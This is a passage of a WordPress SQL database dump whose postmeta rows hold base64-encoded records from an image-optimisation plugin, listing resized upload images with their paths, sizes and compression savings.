VcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTI2MTIxODI5LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5OTM5LCJpZCI6OTA2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEyNjEyMTgyOS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMjYxMjE4MjktMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTI2MTIxODI5LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5OTQxLCJpZCI6OTA2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEyNjEyMTgyOS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMjYxMjE4MjktMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTI2MTIxODI5LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5OTQ0LCJpZCI6OTA2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEyNjEyMTgyOS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMjYxMjE4MjktMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTI2MTIxODI5LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5OTQ2LCJpZCI6OTA2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEyNjEyMTgyOS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMjYxMjE4MjktNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTI2MTIxODI5LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc5OTQ5LCJpZCI6OTA2fV0='); 
INSERT INTO `wp_postmeta` VALUES (29900, 905, 'wpfc_optimisation_reduction', '13831'); 
INSERT INTO `wp_postmeta` VALUES (29901, 905, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMS5qcGciLCJ3aWR0aCI6MzA3MiwiaGVpZ2h0IjoyMzA0LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTc5OTU0LCJpZCI6IjkwNSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2NDYsInRpbWUiOjE0ODM1Nzk5NTcsImlkIjo5MDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTEtODAweDYwMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMS04MDB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xLTgwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNDgwLCJ0aW1lIjoxNDgzNTc5OTYyLCJpZCI6OTA1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xLTc2OHg1NzYuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NzYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTEtNzY4eDU3Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMS03Njh4NTc2LmpwZyIsInJlZHVjdGlvbiI6MTQ1NCwidGltZSI6MTQ4MzU3OTk2NiwiaWQiOjkwNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMS0xNjAweDEyMDAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMS0xNjAweDEyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTEtMTYwMHgxMjAwLmpwZyIsInJlZHVjdGlvbiI6MzU4OSwidGltZSI6MTQ4MzU3OTk3MSwiaWQiOjkwNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU5NiwidGltZSI6MTQ4MzU3OTk3NSwiaWQiOjkwNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTEtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ2MSwidGltZSI6MTQ4MzU3OTk3OCwiaWQiOjkwNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ5MywidGltZSI6MTQ4MzU3OTk4MiwiaWQiOjkwNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjExMjIsInRpbWUiOjE0ODM1Nzk5ODYsImlkIjo5MDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTEtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQ4NSwidGltZSI6MTQ4MzU3OTk5MCwiaWQiOjkwNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTEtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NTU4LCJ0aW1lIjoxNDgzNTc5OTkzLCJpZCI6OTA1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTEtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo4MjAsInRpbWUiOjE0ODM1Nzk5OTcsImlkIjo5MDV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTEtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjkyNywidGltZSI6MTQ4MzU4MDAwMCwiaWQiOjkwNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTEtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MTIwMCwidGltZSI6MTQ4MzU4MDAwNCwiaWQiOjkwNX1d'); 
INSERT INTO `wp_postmeta` VALUES (29902, 902, 'wpfc_optimisation_reduction', '14075'); 
INSERT INTO `wp_postmeta` VALUES (29903, 902, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1ibGVuZGVkLUVQT1hZLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1ibGVuZGVkLUVQT1hZLmpwZyIsIndpZHRoIjoyODMyLCJoZWlnaHQiOjQyNTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1ODAwMDksImlkIjoiOTAyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjY0OSwidGltZSI6MTQ4MzU4MDAxMywiaWQiOjkwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktNTMyeDgwMC5qcGciLCJ3aWR0aCI6NTMyLCJoZWlnaHQiOjgwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktNTMyeDgwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktNTMyeDgwMC5qcGciLCJyZWR1Y3Rpb24iOjEwNDIsInRpbWUiOjE0ODM1ODAwMTcsImlkIjo5MDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1ibGVuZGVkLUVQT1hZLTc2OHgxMTU0LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6MTE1NCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktNzY4eDExNTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi1ibGVuZGVkLUVQT1hZLTc2OHgxMTU0LmpwZyIsInJlZHVjdGlvbiI6MjAxNywidGltZSI6MTQ4MzU4MDAyMSwiaWQiOjkwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktMTA2NXgxNjAwLmpwZyIsIndpZHRoIjoxMDY1LCJoZWlnaHQiOjE2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi1ibGVuZGVkLUVQT1hZLTEwNjV4MTYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktMTA2NXgxNjAwLmpwZyIsInJlZHVjdGlvbiI6MzczMiwidGltZSI6MTQ4MzU4MDAyNiwiaWQiOjkwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU0MiwidGltZSI6MTQ4MzU4MDAyOSwiaWQiOjkwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ4NCwidGltZSI6MTQ4MzU4MDAzMiwiaWQiOjkwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLWJsZW5kZWQtRVBPWFktMjI1eDIyNS5qcGciLC